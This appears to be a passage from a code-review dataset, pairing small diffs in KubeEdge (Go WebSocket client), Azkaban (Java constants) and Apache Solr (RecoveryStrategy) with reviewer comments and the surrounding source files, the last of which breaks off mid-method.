klog.Infof("Websocket connect to cloud access successful")
return nil
}
time.Sleep(cloudAccessSleep)
}
return errors.New("max retry count reached when connecting to cloud")
}
//UnInit closes the websocket connection
func (wsc *WebSocketClient) UnInit() {
wsc.connection.Close()
}
//Send sends the message as JSON object through the connection
func (wsc *WebSocketClient) Send(message model.Message) error {
return wsc.connection.WriteMessageAsync(&message)
}
//Receive reads the binary message through the connection
func (wsc *WebSocketClient) Receive() (model.Message, error) {
message := model.Message{}
err := wsc.connection.ReadMessage(&message)
return message, err
}
//Notify logs info
func (wsc *WebSocketClient) Notify(authInfo map[string]string) {
klog.Infof("no op")
}
| 1 | 20,105 | Looks good, but seems `ReadMessage` hadn't used this Deadline in Underlying `WSConnection`? | kubeedge-kubeedge | go |
@@ -89,6 +89,8 @@ public class Constants {
// The flow exec id for a flow trigger instance unable to trigger a flow yet
public static final int FAILED_EXEC_ID = -2;
+ // Name of the file which keeps project directory size
+ public static final String PROJECT_DIR_SIZE_FILE_NAME = "_azkaban_project_dir_size_in_bytes_";
public static class ConfigurationKeys {
| 1 | /*
* Copyright 2018 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package azkaban;
import java.time.Duration;
/**
* Constants used in configuration files or shared among classes.
*
* <p>Conventions:
*
* <p>Internal constants to be put in the {@link Constants} class
*
* <p>Configuration keys to be put in the {@link ConfigurationKeys} class
*
* <p>Flow level properties keys to be put in the {@link FlowProperties} class
*
* <p>Job level Properties keys to be put in the {@link JobProperties} class
*
* <p>Use '.' to separate name spaces and '_" to separate words in the same namespace. e.g.
* azkaban.job.some_key</p>
*/
public class Constants {
// Azkaban Flow Versions
public static final double DEFAULT_AZKABAN_FLOW_VERSION = 1.0;
public static final double AZKABAN_FLOW_VERSION_2_0 = 2.0;
// Flow 2.0 file suffix
public static final String PROJECT_FILE_SUFFIX = ".project";
public static final String FLOW_FILE_SUFFIX = ".flow";
// Flow 2.0 node type
public static final String NODE_TYPE = "type";
public static final String FLOW_NODE_TYPE = "flow";
// Flow 2.0 flow and job path delimiter
public static final String PATH_DELIMITER = ":";
// Job properties override suffix
public static final String JOB_OVERRIDE_SUFFIX = ".jor";
// Names and paths of various file names to configure Azkaban
public static final String AZKABAN_PROPERTIES_FILE = "azkaban.properties";
public static final String AZKABAN_PRIVATE_PROPERTIES_FILE = "azkaban.private.properties";
public static final String DEFAULT_CONF_PATH = "conf";
public static final String AZKABAN_EXECUTOR_PORT_FILENAME = "executor.port";
public static final String AZKABAN_EXECUTOR_PORT_FILE = "executor.portfile";
public static final String AZKABAN_SERVLET_CONTEXT_KEY = "azkaban_app";
// Internal username used to perform SLA action
public static final String AZKABAN_SLA_CHECKER_USERNAME = "azkaban_sla";
// Memory check retry interval when OOM in ms
public static final long MEMORY_CHECK_INTERVAL_MS = 1000 * 60 * 1;
// Max number of memory check retry
public static final int MEMORY_CHECK_RETRY_LIMIT = 720;
public static final int DEFAULT_PORT_NUMBER = 8081;
public static final int DEFAULT_SSL_PORT_NUMBER = 8443;
public static final int DEFAULT_JETTY_MAX_THREAD_COUNT = 20;
// One Schedule's default End Time: 01/01/2050, 00:00:00, UTC
public static final long DEFAULT_SCHEDULE_END_EPOCH_TIME = 2524608000000L;
// Default flow trigger max wait time
public static final Duration DEFAULT_FLOW_TRIGGER_MAX_WAIT_TIME = Duration.ofDays(10);
public static final Duration MIN_FLOW_TRIGGER_WAIT_TIME = Duration.ofMinutes(1);
// The flow exec id for a flow trigger instance which hasn't started a flow yet
public static final int UNASSIGNED_EXEC_ID = -1;
// The flow exec id for a flow trigger instance unable to trigger a flow yet
public static final int FAILED_EXEC_ID = -2;
public static class ConfigurationKeys {
// Configures Azkaban Flow Version in project YAML file
public static final String AZKABAN_FLOW_VERSION = "azkaban-flow-version";
// These properties are configurable through azkaban.properties
public static final String AZKABAN_PID_FILENAME = "azkaban.pid.filename";
// Defines a list of external links, each referred to as a topic
public static final String AZKABAN_SERVER_EXTERNAL_TOPICS = "azkaban.server.external.topics";
// External URL template of a given topic, specified in the list defined above
public static final String AZKABAN_SERVER_EXTERNAL_TOPIC_URL = "azkaban.server.external.${topic}.url";
// Designates one of the external link topics to correspond to an execution analyzer
public static final String AZKABAN_SERVER_EXTERNAL_ANALYZER_TOPIC = "azkaban.server.external.analyzer.topic";
public static final String AZKABAN_SERVER_EXTERNAL_ANALYZER_LABEL = "azkaban.server.external.analyzer.label";
// Designates one of the external link topics to correspond to a job log viewer
public static final String AZKABAN_SERVER_EXTERNAL_LOGVIEWER_TOPIC = "azkaban.server.external.logviewer.topic";
public static final String AZKABAN_SERVER_EXTERNAL_LOGVIEWER_LABEL = "azkaban.server.external.logviewer.label";
/*
* Hadoop/Spark user job link.
* Example:
* a) azkaban.server.external.resource_manager_job_url=http://***rm***:8088/cluster/app/application_${application.id}
* b) azkaban.server.external.history_server_job_url=http://***jh***:19888/jobhistory/job/job_${application.id}
* c) azkaban.server.external.spark_history_server_job_url=http://***sh***:18080/history/application_${application.id}/1/jobs
* */
public static final String RESOURCE_MANAGER_JOB_URL = "azkaban.server.external.resource_manager_job_url";
public static final String HISTORY_SERVER_JOB_URL = "azkaban.server.external.history_server_job_url";
public static final String SPARK_HISTORY_SERVER_JOB_URL = "azkaban.server.external.spark_history_server_job_url";
// Configures the Kafka appender for logging user jobs, specified for the exec server
public static final String AZKABAN_SERVER_LOGGING_KAFKA_BROKERLIST = "azkaban.server.logging.kafka.brokerList";
public static final String AZKABAN_SERVER_LOGGING_KAFKA_TOPIC = "azkaban.server.logging.kafka.topic";
// Represent the class name of azkaban metrics reporter.
public static final String CUSTOM_METRICS_REPORTER_CLASS_NAME = "azkaban.metrics.reporter.name";
// Represent the metrics server URL.
public static final String METRICS_SERVER_URL = "azkaban.metrics.server.url";
public static final String IS_METRICS_ENABLED = "azkaban.is.metrics.enabled";
// User facing web server configurations used to construct the user facing server URLs. They are useful when there is a reverse proxy between Azkaban web servers and users.
// enduser -> myazkabanhost:443 -> proxy -> localhost:8081
// when this parameters set then these parameters are used to generate email links.
// if these parameters are not set then jetty.hostname, and jetty.port(if ssl configured jetty.ssl.port) are used.
public static final String AZKABAN_WEBSERVER_EXTERNAL_HOSTNAME = "azkaban.webserver.external_hostname";
public static final String AZKABAN_WEBSERVER_EXTERNAL_SSL_PORT = "azkaban.webserver.external_ssl_port";
public static final String AZKABAN_WEBSERVER_EXTERNAL_PORT = "azkaban.webserver.external_port";
// Hostname for the host, if not specified, canonical hostname will be used
public static final String AZKABAN_SERVER_HOST_NAME = "azkaban.server.hostname";
// List of users we prevent azkaban from running flows as. (ie: root, azkaban)
public static final String BLACK_LISTED_USERS = "azkaban.server.blacklist.users";
// Path name of execute-as-user executable
public static final String AZKABAN_SERVER_NATIVE_LIB_FOLDER = "azkaban.native.lib";
// Name of *nix group associated with the process running Azkaban
public static final String AZKABAN_SERVER_GROUP_NAME = "azkaban.group.name";
// Legacy configs section, new configs should follow the naming convention of azkaban.server.<rest of the name> for server configs.
// The property is used for the web server to get the host name of the executor when running in SOLO mode.
public static final String EXECUTOR_HOST = "executor.host";
// The property is used for the web server to get the port of the executor when running in SOLO mode.
public static final String EXECUTOR_PORT = "executor.port";
// Max flow running time in mins, server will kill flows running longer than this setting.
// if not set or <= 0, then there's no restriction on running time.
public static final String AZKABAN_MAX_FLOW_RUNNING_MINS = "azkaban.server.flow.max.running.minutes";
public static final String AZKABAN_STORAGE_TYPE = "azkaban.storage.type";
public static final String AZKABAN_STORAGE_LOCAL_BASEDIR = "azkaban.storage.local.basedir";
public static final String HADOOP_CONF_DIR_PATH = "hadoop.conf.dir.path";
public static final String AZKABAN_STORAGE_HDFS_ROOT_URI = "azkaban.storage.hdfs.root.uri";
public static final String AZKABAN_KERBEROS_PRINCIPAL = "azkaban.kerberos.principal";
public static final String AZKABAN_KEYTAB_PATH = "azkaban.keytab.path";
public static final String PROJECT_TEMP_DIR = "project.temp.dir";
// Event reporting properties
public static final String AZKABAN_EVENT_REPORTING_CLASS_PARAM =
"azkaban.event.reporting.class";
public static final String AZKABAN_EVENT_REPORTING_ENABLED = "azkaban.event.reporting.enabled";
public static final String AZKABAN_EVENT_REPORTING_KAFKA_BROKERS =
"azkaban.event.reporting.kafka.brokers";
public static final String AZKABAN_EVENT_REPORTING_KAFKA_TOPIC =
"azkaban.event.reporting.kafka.topic";
public static final String AZKABAN_EVENT_REPORTING_KAFKA_SCHEMA_REGISTRY_URL =
"azkaban.event.reporting.kafka.schema.registry.url";
/*
* The max number of artifacts retained per project.
* Accepted Values:
* - 0 : Save all artifacts. No clean up is done on storage.
* - 1, 2, 3, ... (any +ve integer 'n') : Maintain 'n' latest versions in storage
*
* Note: Having an unacceptable value results in an exception and the service would REFUSE
* to start.
*
* Example:
* a) azkaban.storage.artifact.max.retention=all
* implies save all artifacts
* b) azkaban.storage.artifact.max.retention=3
* implies save latest 3 versions saved in storage.
**/
public static final String AZKABAN_STORAGE_ARTIFACT_MAX_RETENTION = "azkaban.storage.artifact.max.retention";
// enable quartz scheduler and flow trigger if true.
public static final String ENABLE_QUARTZ = "azkaban.server.schedule.enable_quartz";
public static final String CUSTOM_CREDENTIAL_NAME = "azkaban.security.credential";
// dir to keep dependency plugins
public static final String DEPENDENCY_PLUGIN_DIR = "azkaban.dependency.plugin.dir";
public static final String USE_MULTIPLE_EXECUTORS = "azkaban.use.multiple.executors";
public static final String MAX_CONCURRENT_RUNS_ONEFLOW = "azkaban.max.concurrent.runs.oneflow";
public static final String WEBSERVER_QUEUE_SIZE = "azkaban.webserver.queue.size";
public static final String ACTIVE_EXECUTOR_REFRESH_IN_MS =
"azkaban.activeexecutor.refresh.milisecinterval";
public static final String ACTIVE_EXECUTOR_REFRESH_IN_NUM_FLOW =
"azkaban.activeexecutor.refresh.flowinterval";
public static final String EXECUTORINFO_REFRESH_MAX_THREADS =
"azkaban.executorinfo.refresh.maxThreads";
public static final String MAX_DISPATCHING_ERRORS_PERMITTED = "azkaban.maxDispatchingErrors";
public static final String EXECUTOR_SELECTOR_FILTERS = "azkaban.executorselector.filters";
public static final String EXECUTOR_SELECTOR_COMPARATOR_PREFIX =
"azkaban.executorselector.comparator.";
public static final String QUEUEPROCESSING_ENABLED = "azkaban.queueprocessing.enabled";
public static final String SESSION_TIME_TO_LIVE = "session.time.to.live";
}
public static class FlowProperties {
// Basic properties of flows as set by the executor server
public static final String AZKABAN_FLOW_PROJECT_NAME = "azkaban.flow.projectname";
public static final String AZKABAN_FLOW_FLOW_ID = "azkaban.flow.flowid";
public static final String AZKABAN_FLOW_SUBMIT_USER = "azkaban.flow.submituser";
public static final String AZKABAN_FLOW_EXEC_ID = "azkaban.flow.execid";
public static final String AZKABAN_FLOW_PROJECT_VERSION = "azkaban.flow.projectversion";
}
public static class JobProperties {
// Job property that enables/disables using Kafka logging of user job logs
public static final String AZKABAN_JOB_LOGGING_KAFKA_ENABLE = "azkaban.job.logging.kafka.enable";
/*
* this parameter is used to replace EXTRA_HCAT_LOCATION that could fail when one of the uris is not available.
* EXTRA_HCAT_CLUSTERS has the following format:
* other_hcat_clusters = "thrift://hcat1:port,thrift://hcat2:port;thrift://hcat3:port,thrift://hcat4:port"
* Each string in the parenthesis is regarded as a "cluster", and we will get a delegation token from each cluster.
* The uris(hcat servers) in a "cluster" ensures HA is provided.
**/
public static final String EXTRA_HCAT_CLUSTERS = "azkaban.job.hive.other_hcat_clusters";
/*
* the settings to be defined by user indicating if there are hcat locations other than the
* default one the system should pre-fetch hcat token from. Note: Multiple thrift uris are
* supported, use comma to separate the values, values are case insensitive.
**/
// Use EXTRA_HCAT_CLUSTERS instead
@Deprecated
public static final String EXTRA_HCAT_LOCATION = "other_hcat_location";
// If true, AZ will fetches the jobs' certificate from remote Certificate Authority.
public static final String ENABLE_JOB_SSL = "azkaban.job.enable.ssl";
// Job properties that indicate maximum memory size
public static final String JOB_MAX_XMS = "job.max.Xms";
public static final String MAX_XMS_DEFAULT = "1G";
public static final String JOB_MAX_XMX = "job.max.Xmx";
public static final String MAX_XMX_DEFAULT = "2G";
// The hadoop user the job should run under. If not specified, it will default to submit user.
public static final String USER_TO_PROXY = "user.to.proxy";
/**
* Format string for Log4j's EnhancedPatternLayout
*/
public static final String JOB_LOG_LAYOUT = "azkaban.job.log.layout";
}
public static class JobCallbackProperties {
public static final String JOBCALLBACK_CONNECTION_REQUEST_TIMEOUT = "jobcallback.connection.request.timeout";
public static final String JOBCALLBACK_CONNECTION_TIMEOUT = "jobcallback.connection.timeout";
public static final String JOBCALLBACK_SOCKET_TIMEOUT = "jobcallback.socket.timeout";
public static final String JOBCALLBACK_RESPONSE_WAIT_TIMEOUT = "jobcallback.response.wait.timeout";
public static final String JOBCALLBACK_THREAD_POOL_SIZE = "jobcallback.thread.pool.size";
}
public static class FlowTriggerProps {
// Flow trigger props
public static final String SCHEDULE_TYPE = "type";
public static final String CRON_SCHEDULE_TYPE = "cron";
public static final String SCHEDULE_VALUE = "value";
public static final String DEP_NAME = "name";
// Flow trigger dependency run time props
public static final String START_TIME = "startTime";
public static final String TRIGGER_INSTANCE_ID = "triggerInstanceId";
}
}
| 1 | 16,513 | Make it "___*" three underscores to make it even less likely to have a collision? I assume it will be hard to change the file name once this change is deployed... | azkaban-azkaban | java |
@@ -432,7 +432,7 @@ public class RecoveryStrategy implements Runnable, Closeable {
/**
* @return true if we have reached max attempts or should stop recovering for some other reason
*/
- private boolean waitBetweenRecoveries(String coreName) {
+ final private boolean waitBetweenRecoveries(String coreName) {
// lets pause for a moment and we need to try again...
// TODO: we don't want to retry for some problems?
// Or do a fall off retry... | 1 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.solr.cloud;
import java.io.Closeable;
import java.io.IOException;
import java.lang.invoke.MethodHandles;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.Future;
import java.util.concurrent.TimeUnit;
import org.apache.http.client.methods.HttpUriRequest;
import org.apache.lucene.index.IndexCommit;
import org.apache.lucene.search.MatchAllDocsQuery;
import org.apache.lucene.store.Directory;
import org.apache.solr.client.solrj.SolrServerException;
import org.apache.solr.client.solrj.impl.HttpSolrClient;
import org.apache.solr.client.solrj.impl.HttpSolrClient.HttpUriRequestResponse;
import org.apache.solr.client.solrj.request.AbstractUpdateRequest;
import org.apache.solr.client.solrj.request.CoreAdminRequest.WaitForState;
import org.apache.solr.client.solrj.request.UpdateRequest;
import org.apache.solr.client.solrj.response.SolrPingResponse;
import org.apache.solr.common.SolrException;
import org.apache.solr.common.SolrException.ErrorCode;
import org.apache.solr.common.cloud.DocCollection;
import org.apache.solr.common.cloud.Replica;
import org.apache.solr.common.cloud.Slice;
import org.apache.solr.common.cloud.ZkCoreNodeProps;
import org.apache.solr.common.cloud.ZkNodeProps;
import org.apache.solr.common.cloud.ZkStateReader;
import org.apache.solr.common.cloud.ZooKeeperException;
import org.apache.solr.common.params.ModifiableSolrParams;
import org.apache.solr.common.params.UpdateParams;
import org.apache.solr.common.util.NamedList;
import org.apache.solr.core.CoreContainer;
import org.apache.solr.core.CoreDescriptor;
import org.apache.solr.core.DirectoryFactory.DirContext;
import org.apache.solr.core.SolrCore;
import org.apache.solr.handler.ReplicationHandler;
import org.apache.solr.request.LocalSolrQueryRequest;
import org.apache.solr.request.SolrQueryRequest;
import org.apache.solr.request.SolrRequestHandler;
import org.apache.solr.search.SolrIndexSearcher;
import org.apache.solr.update.CdcrUpdateLog;
import org.apache.solr.update.CommitUpdateCommand;
import org.apache.solr.update.PeerSyncWithLeader;
import org.apache.solr.update.UpdateLog;
import org.apache.solr.update.UpdateLog.RecoveryInfo;
import org.apache.solr.update.UpdateShardHandlerConfig;
import org.apache.solr.util.RefCounted;
import org.apache.solr.util.SolrPluginUtils;
import org.apache.solr.util.plugin.NamedListInitializedPlugin;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
/**
* This class may change in future and customisations are not supported between versions in terms of API or back compat
* behaviour.
*
* @lucene.experimental
*/
public class RecoveryStrategy implements Runnable, Closeable {
public static class Builder implements NamedListInitializedPlugin {
@SuppressWarnings({"rawtypes"})
private NamedList args;
@Override
public void init(@SuppressWarnings({"rawtypes"})NamedList args) {
this.args = args;
}
// this should only be used from SolrCoreState
@SuppressWarnings({"unchecked"})
public RecoveryStrategy create(CoreContainer cc, CoreDescriptor cd,
RecoveryStrategy.RecoveryListener recoveryListener) {
final RecoveryStrategy recoveryStrategy = newRecoveryStrategy(cc, cd, recoveryListener);
SolrPluginUtils.invokeSetters(recoveryStrategy, args);
return recoveryStrategy;
}
protected RecoveryStrategy newRecoveryStrategy(CoreContainer cc, CoreDescriptor cd,
RecoveryStrategy.RecoveryListener recoveryListener) {
return new RecoveryStrategy(cc, cd, recoveryListener);
}
}
private static final Logger log = LoggerFactory.getLogger(MethodHandles.lookup().lookupClass());
private int waitForUpdatesWithStaleStatePauseMilliSeconds = Integer
.getInteger("solr.cloud.wait-for-updates-with-stale-state-pause", 2500);
private int maxRetries = 500;
private int startingRecoveryDelayMilliSeconds = 2000;
public static interface RecoveryListener {
public void recovered();
public void failed();
}
private volatile boolean close = false;
private RecoveryListener recoveryListener;
private ZkController zkController;
private String baseUrl;
private String coreZkNodeName;
private ZkStateReader zkStateReader;
private volatile String coreName;
private int retries;
private boolean recoveringAfterStartup;
private CoreContainer cc;
private volatile HttpUriRequest prevSendPreRecoveryHttpUriRequest;
private final Replica.Type replicaType;
private CoreDescriptor coreDescriptor;
protected RecoveryStrategy(CoreContainer cc, CoreDescriptor cd, RecoveryListener recoveryListener) {
this.cc = cc;
this.coreName = cd.getName();
this.recoveryListener = recoveryListener;
zkController = cc.getZkController();
zkStateReader = zkController.getZkStateReader();
baseUrl = zkController.getBaseUrl();
coreZkNodeName = cd.getCloudDescriptor().getCoreNodeName();
replicaType = cd.getCloudDescriptor().getReplicaType();
}
final public int getWaitForUpdatesWithStaleStatePauseMilliSeconds() {
return waitForUpdatesWithStaleStatePauseMilliSeconds;
}
final public void setWaitForUpdatesWithStaleStatePauseMilliSeconds(
int waitForUpdatesWithStaleStatePauseMilliSeconds) {
this.waitForUpdatesWithStaleStatePauseMilliSeconds = waitForUpdatesWithStaleStatePauseMilliSeconds;
}
final public int getMaxRetries() {
return maxRetries;
}
final public void setMaxRetries(int maxRetries) {
this.maxRetries = maxRetries;
}
final public int getStartingRecoveryDelayMilliSeconds() {
return startingRecoveryDelayMilliSeconds;
}
final public void setStartingRecoveryDelayMilliSeconds(int startingRecoveryDelayMilliSeconds) {
this.startingRecoveryDelayMilliSeconds = startingRecoveryDelayMilliSeconds;
}
final public boolean getRecoveringAfterStartup() {
return recoveringAfterStartup;
}
final public void setRecoveringAfterStartup(boolean recoveringAfterStartup) {
this.recoveringAfterStartup = recoveringAfterStartup;
}
/** Builds a new HttpSolrClient for use in recovery. Caller must close */
private final HttpSolrClient buildRecoverySolrClient(final String leaderUrl) {
// workaround for SOLR-13605: get the configured timeouts & set them directly
// (even though getRecoveryOnlyHttpClient() already has them set)
final UpdateShardHandlerConfig cfg = cc.getConfig().getUpdateShardHandlerConfig();
return (new HttpSolrClient.Builder(leaderUrl)
.withConnectionTimeout(cfg.getDistributedConnectionTimeout())
.withSocketTimeout(cfg.getDistributedSocketTimeout())
.withHttpClient(cc.getUpdateShardHandler().getRecoveryOnlyHttpClient())
).build();
}
// make sure any threads stop retrying
@Override
final public void close() {
close = true;
if (prevSendPreRecoveryHttpUriRequest != null) {
prevSendPreRecoveryHttpUriRequest.abort();
}
log.warn("Stopping recovery for core=[{}] coreNodeName=[{}]", coreName, coreZkNodeName);
}
final private void recoveryFailed(final ZkController zkController,
final CoreDescriptor cd) throws Exception {
SolrException.log(log, "Recovery failed - I give up.");
try {
zkController.publish(cd, Replica.State.RECOVERY_FAILED);
} finally {
close();
recoveryListener.failed();
}
}
/**
* This method may change in future and customisations are not supported between versions in terms of API or back
* compat behaviour.
*
* @lucene.experimental
*/
protected String getReplicateLeaderUrl(ZkNodeProps leaderprops) {
return new ZkCoreNodeProps(leaderprops).getCoreUrl();
}
final private void replicate(String nodeName, SolrCore core, ZkNodeProps leaderprops)
throws SolrServerException, IOException {
final String leaderUrl = getReplicateLeaderUrl(leaderprops);
log.info("Attempting to replicate from [{}].", leaderUrl);
// send commit
commitOnLeader(leaderUrl);
// use rep handler directly, so we can do this sync rather than async
SolrRequestHandler handler = core.getRequestHandler(ReplicationHandler.PATH);
ReplicationHandler replicationHandler = (ReplicationHandler) handler;
if (replicationHandler == null) {
throw new SolrException(ErrorCode.SERVICE_UNAVAILABLE,
"Skipping recovery, no " + ReplicationHandler.PATH + " handler found");
}
ModifiableSolrParams solrParams = new ModifiableSolrParams();
solrParams.set(ReplicationHandler.LEGACY_LEADER_URL, leaderUrl);
solrParams.set(ReplicationHandler.LEGACY_SKIP_COMMIT_ON_LEADER_VERSION_ZERO, replicaType == Replica.Type.TLOG);
// always download the tlogs from the leader when running with cdcr enabled. We need to have all the tlogs
// to ensure leader failover doesn't cause missing docs on the target
if (core.getUpdateHandler().getUpdateLog() != null
&& core.getUpdateHandler().getUpdateLog() instanceof CdcrUpdateLog) {
solrParams.set(ReplicationHandler.TLOG_FILES, true);
}
if (isClosed()) return; // we check closed on return
boolean success = replicationHandler.doFetch(solrParams, false).getSuccessful();
if (!success) {
throw new SolrException(ErrorCode.SERVER_ERROR, "Replication for recovery failed.");
}
// solrcloud_debug
if (log.isDebugEnabled()) {
try {
RefCounted<SolrIndexSearcher> searchHolder = core
.getNewestSearcher(false);
SolrIndexSearcher searcher = searchHolder.get();
Directory dir = core.getDirectoryFactory().get(core.getIndexDir(), DirContext.META_DATA, null);
try {
final IndexCommit commit = core.getDeletionPolicy().getLatestCommit();
if (log.isDebugEnabled()) {
log.debug("{} replicated {} from {} gen: {} data: {} index: {} newIndex: {} files: {}"
, core.getCoreContainer().getZkController().getNodeName()
, searcher.count(new MatchAllDocsQuery())
, leaderUrl
, (null == commit ? "null" : commit.getGeneration())
, core.getDataDir()
, core.getIndexDir()
, core.getNewIndexDir()
, Arrays.asList(dir.listAll()));
}
} finally {
core.getDirectoryFactory().release(dir);
searchHolder.decref();
}
} catch (Exception e) {
log.debug("Error in solrcloud_debug block", e);
}
}
}
final private void commitOnLeader(String leaderUrl) throws SolrServerException,
IOException {
try (HttpSolrClient client = buildRecoverySolrClient(leaderUrl)) {
UpdateRequest ureq = new UpdateRequest();
ureq.setParams(new ModifiableSolrParams());
// ureq.getParams().set(DistributedUpdateProcessor.COMMIT_END_POINT, true);
// ureq.getParams().set(UpdateParams.OPEN_SEARCHER, onlyLeaderIndexes);// Why do we need to open searcher if
// "onlyLeaderIndexes"?
ureq.getParams().set(UpdateParams.OPEN_SEARCHER, false);
ureq.setAction(AbstractUpdateRequest.ACTION.COMMIT, false, true).process(
client);
}
}
@Override
final public void run() {
// set request info for logging
try (SolrCore core = cc.getCore(coreName)) {
if (core == null) {
SolrException.log(log, "SolrCore not found - cannot recover:" + coreName);
return;
}
log.info("Starting recovery process. recoveringAfterStartup={}", recoveringAfterStartup);
try {
doRecovery(core);
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
SolrException.log(log, "", e);
throw new ZooKeeperException(SolrException.ErrorCode.SERVER_ERROR, "", e);
} catch (Exception e) {
log.error("", e);
throw new ZooKeeperException(SolrException.ErrorCode.SERVER_ERROR, "", e);
}
}
}
final public void doRecovery(SolrCore core) throws Exception {
// we can lose our core descriptor, so store it now
this.coreDescriptor = core.getCoreDescriptor();
if (this.coreDescriptor.getCloudDescriptor().requiresTransactionLog()) {
doSyncOrReplicateRecovery(core);
} else {
doReplicateOnlyRecovery(core);
}
}
final private void doReplicateOnlyRecovery(SolrCore core) throws InterruptedException {
boolean successfulRecovery = false;
// if (core.getUpdateHandler().getUpdateLog() != null) {
// SolrException.log(log, "'replicate-only' recovery strategy should only be used if no update logs are present, but
// this core has one: "
// + core.getUpdateHandler().getUpdateLog());
// return;
// }
while (!successfulRecovery && !Thread.currentThread().isInterrupted() && !isClosed()) { // don't use interruption or
// it will close channels
// though
try {
CloudDescriptor cloudDesc = this.coreDescriptor.getCloudDescriptor();
ZkNodeProps leaderprops = zkStateReader.getLeaderRetry(cloudDesc.getCollectionName(), cloudDesc.getShardId());
final String leaderUrl = ZkCoreNodeProps.getCoreUrl(leaderprops);
final String ourUrl = ZkCoreNodeProps.getCoreUrl(baseUrl, coreName);
boolean isLeader = ourUrl.equals(leaderUrl); // TODO: We can probably delete most of this code if we say this
// strategy can only be used for pull replicas
if (isLeader && !cloudDesc.isLeader()) {
throw new SolrException(ErrorCode.SERVER_ERROR, "Cloud state still says we are leader.");
}
if (cloudDesc.isLeader()) {
assert cloudDesc.getReplicaType() != Replica.Type.PULL;
// we are now the leader - no one else must have been suitable
log.warn("We have not yet recovered - but we are now the leader!");
log.info("Finished recovery process.");
zkController.publish(this.coreDescriptor, Replica.State.ACTIVE);
return;
}
if (log.isInfoEnabled()) {
log.info("Publishing state of core [{}] as recovering, leader is [{}] and I am [{}]", core.getName(), leaderUrl,
ourUrl);
}
zkController.publish(this.coreDescriptor, Replica.State.RECOVERING);
if (isClosed()) {
if (log.isInfoEnabled()) {
log.info("Recovery for core {} has been closed", core.getName());
}
break;
}
log.info("Starting Replication Recovery.");
try {
log.info("Stopping background replicate from leader process");
zkController.stopReplicationFromLeader(coreName);
replicate(zkController.getNodeName(), core, leaderprops);
if (isClosed()) {
if (log.isInfoEnabled()) {
log.info("Recovery for core {} has been closed", core.getName());
}
break;
}
log.info("Replication Recovery was successful.");
successfulRecovery = true;
} catch (Exception e) {
SolrException.log(log, "Error while trying to recover", e);
}
} catch (Exception e) {
SolrException.log(log, "Error while trying to recover. core=" + coreName, e);
} finally {
if (successfulRecovery) {
log.info("Restarting background replicate from leader process");
zkController.startReplicationFromLeader(coreName, false);
log.info("Registering as Active after recovery.");
try {
zkController.publish(this.coreDescriptor, Replica.State.ACTIVE);
} catch (Exception e) {
log.error("Could not publish as ACTIVE after succesful recovery", e);
successfulRecovery = false;
}
if (successfulRecovery) {
close = true;
recoveryListener.recovered();
}
}
}
if (!successfulRecovery) {
if (waitBetweenRecoveries(core.getName())) break;
}
}
// We skip core.seedVersionBuckets(); We don't have a transaction log
log.info("Finished recovery process, successful=[{}]", successfulRecovery);
}
/**
* @return true if we have reached max attempts or should stop recovering for some other reason
*/
private boolean waitBetweenRecoveries(String coreName) {
// lets pause for a moment and we need to try again...
// TODO: we don't want to retry for some problems?
// Or do a fall off retry...
try {
if (isClosed()) {
log.info("Recovery for core {} has been closed", coreName);
return true;
}
log.error("Recovery failed - trying again... ({})", retries);
retries++;
if (retries >= maxRetries) {
SolrException.log(log, "Recovery failed - max retries exceeded (" + retries + ").");
try {
recoveryFailed(zkController, this.coreDescriptor);
} catch (Exception e) {
SolrException.log(log, "Could not publish that recovery failed", e);
}
return true;
}
} catch (Exception e) {
SolrException.log(log, "An error has occurred during recovery", e);
}
try {
// Wait an exponential interval between retries, start at 4 seconds and work up to a minute.
// Meanwhile we will check in 2s sub-intervals to see if we've been closed
// Maximum loop count is 30 because we never want to wait longer than a minute (2s * 30 = 1m)
int loopCount = retries < 5 ? (int) Math.pow(2, retries) : 30;
if (log.isInfoEnabled()) {
log.info("Wait [{}] seconds before trying to recover again (attempt={})",
TimeUnit.MILLISECONDS.toSeconds(loopCount * startingRecoveryDelayMilliSeconds), retries);
}
for (int i = 0; i < loopCount; i++) {
if (isClosed()) {
log.info("Recovery for core {} has been closed", coreName);
break; // check if someone closed us
}
Thread.sleep(startingRecoveryDelayMilliSeconds);
}
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
log.warn("Recovery was interrupted.", e);
close = true;
}
return false;
}
// TODO: perhaps make this grab a new core each time through the loop to handle core reloads?
public final void doSyncOrReplicateRecovery(SolrCore core) throws Exception {
boolean successfulRecovery = false;
UpdateLog ulog;
ulog = core.getUpdateHandler().getUpdateLog();
if (ulog == null) {
SolrException.log(log, "No UpdateLog found - cannot recover.");
recoveryFailed(zkController,
this.coreDescriptor);
return;
}
// we temporary ignore peersync for tlog replicas
boolean firstTime = replicaType != Replica.Type.TLOG;
List<Long> recentVersions;
try (UpdateLog.RecentUpdates recentUpdates = ulog.getRecentUpdates()) {
recentVersions = recentUpdates.getVersions(ulog.getNumRecordsToKeep());
} catch (Exception e) {
SolrException.log(log, "Corrupt tlog - ignoring.", e);
recentVersions = new ArrayList<>(0);
}
List<Long> startingVersions = ulog.getStartingVersions();
if (startingVersions != null && recoveringAfterStartup) {
try {
int oldIdx = 0; // index of the start of the old list in the current list
long firstStartingVersion = startingVersions.size() > 0 ? startingVersions.get(0) : 0;
for (; oldIdx < recentVersions.size(); oldIdx++) {
if (recentVersions.get(oldIdx) == firstStartingVersion) break;
}
if (oldIdx > 0) {
